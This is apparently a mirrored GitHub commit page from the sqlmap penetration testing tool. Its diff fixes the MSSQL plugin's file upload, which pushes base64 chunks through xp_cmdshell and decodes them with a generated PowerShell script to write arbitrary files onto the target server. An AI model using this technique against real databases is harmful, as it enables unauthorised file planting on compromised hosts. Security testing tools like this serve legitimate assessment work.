sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 09:36:35 +03:00
Code Issues Packages Projects Releases Wiki Activity

works now.. can upload arbitrary files via powershell now, closes #742

Browse Source
This commit is contained in:
Bernardo Damele 2014-07-01 00:26:59 +01:00
parent 3e431ec202
commit 5c64a31a9c
1 changed files with 5 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
plugins/dbms/mssqlserver/filesystem.py
View File

@ -173,10 +173,10 @@ class Filesystem(GenericFilesystem):
encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True) encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True)
encodedBase64FilePath = "%s\%s" % (tmpPath, encodedBase64File) encodedBase64FilePath = "%s\%s" % (tmpPath, encodedBase64File)
randPSScript = "tmpf%s.ps1" % randomStr(lowercase=True) randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True)
randPSScriptPath = "%s\%s" % (tmpPath, randPSScript) randPSScriptPath = "%s\%s" % (tmpPath, randPSScript)
wFileSize = len(wFileContent) wFileSize = len(encodedFileContent)
chunkMaxSize = 1024 chunkMaxSize = 1024
logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath) logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath)
@ -186,9 +186,10 @@ class Filesystem(GenericFilesystem):
self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File) self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File)
#psString = "$Content = [System.Convert]::FromBase64String(\"%s\"); Set-Content -Path \"%s\" -Value $Content -Encoding Byte" % (encodedFileContent, dFile) #psString = "$Content = [System.Convert]::FromBase64String(\"%s\"); Set-Content -Path \"%s\" -Value $Content -Encoding Byte" % (encodedFileContent, dFile)
psString = "$Base64 = Get-Content -Path %s; $Content = " % encodedBase64FilePath psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath
psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = "
psString += "[System.Convert]::FromBase64String($Base64); Set-Content " psString += "[System.Convert]::FromBase64String($Base64); Set-Content "
psString += "-Path %s -Value $Content -Encoding Byte" % dFile psString += "-Path \"%s\" -Value $Content -Encoding Byte" % dFile
logger.debug("uploading the PowerShell base64-decoding script to %s, please wait.." % randPSScriptPath) logger.debug("uploading the PowerShell base64-decoding script to %s, please wait.." % randPSScriptPath)
self.xpCmdshellWriteFile(psString, tmpPath, randPSScript) self.xpCmdshellWriteFile(psString, tmpPath, randPSScript)